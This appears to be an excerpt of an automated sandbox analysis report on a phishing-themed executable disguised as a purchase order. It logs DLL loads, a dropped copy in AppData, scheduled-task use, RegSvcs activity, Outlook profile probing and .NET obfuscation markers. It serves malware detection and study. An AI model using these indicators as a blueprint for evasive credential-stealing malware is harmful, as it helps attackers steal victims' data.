                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dll
                    Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: purchase order - PO-011024-201.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: purchase order - PO-011024-201.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: purchase order - PO-011024-201.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: GVAj.pdbSHA256 source: purchase order - PO-011024-201.exe, jDCErdK.exe.0.dr
                    Source: Binary string: GVAj.pdb source: purchase order - PO-011024-201.exe, jDCErdK.exe.0.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: purchase order - PO-011024-201.exe, frm_login.cs.Net Code: InitializeComponent
                    Source: jDCErdK.exe.0.dr, frm_login.cs.Net Code: InitializeComponent
                    Source: 0.2.purchase order - PO-011024-201.exe.5b20000.8.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.purchase order - PO-011024-201.exe.5b20000.8.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, fsrIvttXdmKqMmWchj.cs.Net Code: gD5R8QiKx1 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, fsrIvttXdmKqMmWchj.cs.Net Code: gD5R8QiKx1 System.Reflection.Assembly.Load(byte[])
                    Source: purchase order - PO-011024-201.exeStatic PE information: 0xA98D3912 [Sat Feb 21 15:58:10 2060 UTC]
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_05060C01 push 8BBCEB50h; ret 0_2_05060C07
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeCode function: 0_2_05064C38 push esp; retf 0_2_05064C39
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01310C6D push edi; retf 8_2_01310C7A
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeCode function: 9_2_0109F110 pushad ; iretd 9_2_0109F111
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00DC0C6D push edi; retf 13_2_00DC0C7A
                    Source: purchase order - PO-011024-201.exeStatic PE information: section name: .text entropy: 7.154325575878405
                    Source: jDCErdK.exe.0.drStatic PE information: section name: .text entropy: 7.154325575878405
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, US53hBeX2Yv4yyUQQS.csHigh entropy of concatenated method names: 'ToString', 'j3n6e3nORq', 'sj96wtB724', 'k9w6DOxn6l', 'gZ86QMtG2Y', 'r2e6oXd7D5', 'h6f6PCxQYj', 'emn6XRCx1g', 'RWD6kYcCFK', 'h6O6xoj3lo'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, HSVRsurxF9WEZHbBtg.csHigh entropy of concatenated method names: 'RJPjIRwXuB', 'PFLjg1gJKa', 'vuCjiYQc87', 'C16jTGA92R', 'txXjC0pniN', 'VJfj6XDJYd', 'hfgmy59HCY4M7nBtoq', 'HJ52Qwxkc1erEmdaS9', 'Ct5jjkht7m', 'xqZjG6MLo4'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, QWCRbbI3GySMOlMgIK.csHigh entropy of concatenated method names: 'aqxdUKh5lj', 'ItVd0OBJkM', 'vS7dAnsiuZ', 'rCVdWKcxa1', 'W9sdCG8pQJ', 'Burd6kOSeQ', 'cmpdMXy51X', 'gKpdStG7U0', 'rqtdaM3P2w', 'KDFdto3big'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, UAqO0Z5BuvB48Dfytc.csHigh entropy of concatenated method names: 'Mj4qsOk4Dp', 'BIZqHsSMst', 'OiGqvmd1rh', 'IGiqLoZHgo', 'BPEqbfYEtv', 'qd2q5Zu56U', 'vepq1otiQS', 'a3HqJKEQMe', 'MLBq3f7Gi2', 'XwvqYtWeUT'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, d5xZqVotHfWSRMXhZ1.csHigh entropy of concatenated method names: 'Ujq8OZyua', 'DPwUFF4Jy', 'P5X0kkgsh', 'HciyJY8Oc', 'Xg1WrrSQn', 'j4J4nuP2k', 'QFdhO1JAmlkFyDGAuI', 'Qu2eUwXKVePJR4EXIr', 'WxJSBulnK', 'yPEt1DJjr'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, z3LmuL4b9jRNKbPX8bF.csHigh entropy of concatenated method names: 'JUyamExD3Y', 'l5Oaf8LgWn', 'mGoa8P1Vsg', 'zctaUvU2S2', 'rAbaNglrh7', 'wEGa0uqUyQ', 'y5Kay9soJV', 'ILwaAvCwTm', 'Q3baW4Sdex', 'rNHa4mAR82'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, uhsEbYft7aKYZux5VK.csHigh entropy of concatenated method names: 'LhPaj5Dnxh', 'TS5aGxOBap', 'q3maRfEx9A', 'GK7alpSxnR', 'KBNaqsm08f', 'a9VaZeBReG', 'TpeanLYg8u', 'NO3S1xtLsV', 'V5SSJUj7J4', 'e4CS3JMY18'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, y58Y9F7xpCVn0tEdfc.csHigh entropy of concatenated method names: 'KOnMJeug24', 'NWwMYEhipC', 'R2lSr97Kkq', 'dwRSj61Vu6', 'MlXMeykVyh', 'mDwMVN6Q01', 'zZ5MhMHwKG', 'nNAMsliyGS', 'zZMMHQYjuK', 'ENwMvmnmoe'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, OJYY5LkN8SVEi7q0ZP.csHigh entropy of concatenated method names: 'Mf7ZNOu2fM', 'BUwZyY9P3j', 'r1rdDbD56I', 'QFUdQ3KqGq', 'vZNdo18q1U', 'jTPdPiVSFE', 'q2gdXpCHFb', 'smsdk5YP71', 'uNSdxSujie', 'iL4dFkXD4p'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, bvN3s3644Act0Z55I1.csHigh entropy of concatenated method names: 'yXiIllQss4', 'EPPId0XEOQ', 'VRpIniOebJ', 'SsenY2Wa5i', 'TGmnz1vI2Y', 'hcYIrEW3Nu', 'ul3Ijx6ZDo', 'BKfI7kcTDO', 'YycIGhBEoP', 'euGIRvNQGQ'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, Ew5TcBzrgyvqynmUSS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O9Aa9i8OUe', 'aDEaCv6d7a', 'zgFa6RiTKf', 'vCpaMDYvQS', 'Fr5aSKYvA3', 'lNEaa1cfFf', 'RvyatnVdQN'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, uVG0PXFe9nfInx7Pdk.csHigh entropy of concatenated method names: 'ovcn2g1KXd', 'bxynqW1ved', 'SeOnZJmBrV', 'PUVnIXjW69', 'GLIngqlZMw', 'CgMZbQTDIT', 'tkaZ5sbah8', 'g4MZ1uMFvO', 'rJeZJviFCL', 'y7cZ314lK6'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, T3uKypOkAr9vDMmxpI.csHigh entropy of concatenated method names: 'YBvCFeLN6D', 'kdfCVeFfEt', 'rEGCsCFKoX', 'A5sCHkkZAZ', 'uigCwLcgOR', 'Rn8CD6ODLj', 'K0TCQrVyJH', 'zLACoZOc1M', 'y2ECPk9NfD', 'uj6CXZCMZ3'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, p66OHUaTFBsviW7LIo.csHigh entropy of concatenated method names: 'Dispose', 'AMsj3r77BD', 'XVn7wIqyq2', 'uphOO5xddc', 'RkUjY38kvw', 'uiFjzIPKFu', 'ProcessDialogKey', 'Dxr7r4lLZq', 'yh77jRswAp', 'gsO77dEICu'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, fsrIvttXdmKqMmWchj.csHigh entropy of concatenated method names: 'PyCG2gRWBy', 'YqgGlfIDbB', 'CtfGq8a3mm', 'QS9Gdpjc3p', 'UDsGZQJb7o', 'AanGneUVQS', 'kTgGIcN6Q3', 'pp8GgEhaEk', 'f1tGcD81Wr', 'tS1Girghq0'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, WcaNQhB3bw1x35cBHL.csHigh entropy of concatenated method names: 'QeUImDipFo', 'VLgIfaAVy2', 'BnPI8hDYeK', 'fYeIUwMcNo', 'nJSINxh3HL', 'FywI0hM8FO', 'xjIIyJOVo1', 'e8kIAsE5C8', 'kLaIWfdAry', 'HQnI4DHXsk'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, BvSJtFG5lWjZ7c1TuV.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'vam73npoQn', 'uwD7YIIhPe', 'Jei7zY76H4', 'rO6Gr8FerQ', 'rRCGj5hgq1', 'x74G78GIMR', 'MXfGGAUV9M', 'L0aG0eMtHyjHRCLMOPh'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, H9EGUT2SKjXSJfk38q.csHigh entropy of concatenated method names: 'KdCMi83bL8', 'AUSMTdqiNa', 'ToString', 'GDAMld4Zg7', 'xNoMqfMyN1', 'fgYMdocHEc', 's58MZUsN3A', 'yBPMnl1vxM', 'pXgMIvWQTt', 'VlTMg2nD6m'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, LO5KghyFmULJZEXBJx.csHigh entropy of concatenated method names: 'ffR9ANwNJr', 'GOp9WqWOYX', 'uZk9pqylTW', 'S3w9wnnLtq', 'lO99QrGL3G', 'LZ89oBYbhs', 'TqD9XReOJa', 'Pa89klqZ9x', 'I5c9FVwRgc', 'C3h9e5N6nF'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, vXxeeL4UMKpi5529nPR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JurtsH1nIn', 'OlftH44lV6', 'dZatvyKva4', 'WkstLG4C6n', 'EjYtbZ7Wq3', 'BKvt545Wtf', 'qeYt1DnTZp'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, pt09oCJZUOjinJQ3Wg.csHigh entropy of concatenated method names: 'ADTSlRbq7L', 'MCkSqKirvH', 'ICCSdeLA6Q', 'LwuSZFUIRg', 'KH8SnxngwD', 'gudSIxLKuy', 'w8KSg1YgOR', 'UbWScFVQIg', 'UmASiWidMk', 'i9aSTsjhn6'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, US53hBeX2Yv4yyUQQS.csHigh entropy of concatenated method names: 'ToString', 'j3n6e3nORq', 'sj96wtB724', 'k9w6DOxn6l', 'gZ86QMtG2Y', 'r2e6oXd7D5', 'h6f6PCxQYj', 'emn6XRCx1g', 'RWD6kYcCFK', 'h6O6xoj3lo'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, HSVRsurxF9WEZHbBtg.csHigh entropy of concatenated method names: 'RJPjIRwXuB', 'PFLjg1gJKa', 'vuCjiYQc87', 'C16jTGA92R', 'txXjC0pniN', 'VJfj6XDJYd', 'hfgmy59HCY4M7nBtoq', 'HJ52Qwxkc1erEmdaS9', 'Ct5jjkht7m', 'xqZjG6MLo4'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, QWCRbbI3GySMOlMgIK.csHigh entropy of concatenated method names: 'aqxdUKh5lj', 'ItVd0OBJkM', 'vS7dAnsiuZ', 'rCVdWKcxa1', 'W9sdCG8pQJ', 'Burd6kOSeQ', 'cmpdMXy51X', 'gKpdStG7U0', 'rqtdaM3P2w', 'KDFdto3big'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, UAqO0Z5BuvB48Dfytc.csHigh entropy of concatenated method names: 'Mj4qsOk4Dp', 'BIZqHsSMst', 'OiGqvmd1rh', 'IGiqLoZHgo', 'BPEqbfYEtv', 'qd2q5Zu56U', 'vepq1otiQS', 'a3HqJKEQMe', 'MLBq3f7Gi2', 'XwvqYtWeUT'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, d5xZqVotHfWSRMXhZ1.csHigh entropy of concatenated method names: 'Ujq8OZyua', 'DPwUFF4Jy', 'P5X0kkgsh', 'HciyJY8Oc', 'Xg1WrrSQn', 'j4J4nuP2k', 'QFdhO1JAmlkFyDGAuI', 'Qu2eUwXKVePJR4EXIr', 'WxJSBulnK', 'yPEt1DJjr'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, z3LmuL4b9jRNKbPX8bF.csHigh entropy of concatenated method names: 'JUyamExD3Y', 'l5Oaf8LgWn', 'mGoa8P1Vsg', 'zctaUvU2S2', 'rAbaNglrh7', 'wEGa0uqUyQ', 'y5Kay9soJV', 'ILwaAvCwTm', 'Q3baW4Sdex', 'rNHa4mAR82'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, uhsEbYft7aKYZux5VK.csHigh entropy of concatenated method names: 'LhPaj5Dnxh', 'TS5aGxOBap', 'q3maRfEx9A', 'GK7alpSxnR', 'KBNaqsm08f', 'a9VaZeBReG', 'TpeanLYg8u', 'NO3S1xtLsV', 'V5SSJUj7J4', 'e4CS3JMY18'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, y58Y9F7xpCVn0tEdfc.csHigh entropy of concatenated method names: 'KOnMJeug24', 'NWwMYEhipC', 'R2lSr97Kkq', 'dwRSj61Vu6', 'MlXMeykVyh', 'mDwMVN6Q01', 'zZ5MhMHwKG', 'nNAMsliyGS', 'zZMMHQYjuK', 'ENwMvmnmoe'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, OJYY5LkN8SVEi7q0ZP.csHigh entropy of concatenated method names: 'Mf7ZNOu2fM', 'BUwZyY9P3j', 'r1rdDbD56I', 'QFUdQ3KqGq', 'vZNdo18q1U', 'jTPdPiVSFE', 'q2gdXpCHFb', 'smsdk5YP71', 'uNSdxSujie', 'iL4dFkXD4p'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, bvN3s3644Act0Z55I1.csHigh entropy of concatenated method names: 'yXiIllQss4', 'EPPId0XEOQ', 'VRpIniOebJ', 'SsenY2Wa5i', 'TGmnz1vI2Y', 'hcYIrEW3Nu', 'ul3Ijx6ZDo', 'BKfI7kcTDO', 'YycIGhBEoP', 'euGIRvNQGQ'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, Ew5TcBzrgyvqynmUSS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O9Aa9i8OUe', 'aDEaCv6d7a', 'zgFa6RiTKf', 'vCpaMDYvQS', 'Fr5aSKYvA3', 'lNEaa1cfFf', 'RvyatnVdQN'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, uVG0PXFe9nfInx7Pdk.csHigh entropy of concatenated method names: 'ovcn2g1KXd', 'bxynqW1ved', 'SeOnZJmBrV', 'PUVnIXjW69', 'GLIngqlZMw', 'CgMZbQTDIT', 'tkaZ5sbah8', 'g4MZ1uMFvO', 'rJeZJviFCL', 'y7cZ314lK6'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, T3uKypOkAr9vDMmxpI.csHigh entropy of concatenated method names: 'YBvCFeLN6D', 'kdfCVeFfEt', 'rEGCsCFKoX', 'A5sCHkkZAZ', 'uigCwLcgOR', 'Rn8CD6ODLj', 'K0TCQrVyJH', 'zLACoZOc1M', 'y2ECPk9NfD', 'uj6CXZCMZ3'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, p66OHUaTFBsviW7LIo.csHigh entropy of concatenated method names: 'Dispose', 'AMsj3r77BD', 'XVn7wIqyq2', 'uphOO5xddc', 'RkUjY38kvw', 'uiFjzIPKFu', 'ProcessDialogKey', 'Dxr7r4lLZq', 'yh77jRswAp', 'gsO77dEICu'
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, fsrIvttXdmKqMmWchj.csHigh entropy of concatenated method names: 'PyCG2gRWBy', 'YqgGlfIDbB', 'CtfGq8a3mm', 'QS9Gdpjc3p', 'UDsGZQJb7o', 'AanGneUVQS', 'kTgGIcN6Q3', 'pp8GgEhaEk', 'f1tGcD81Wr', 'tS1Girghq0'
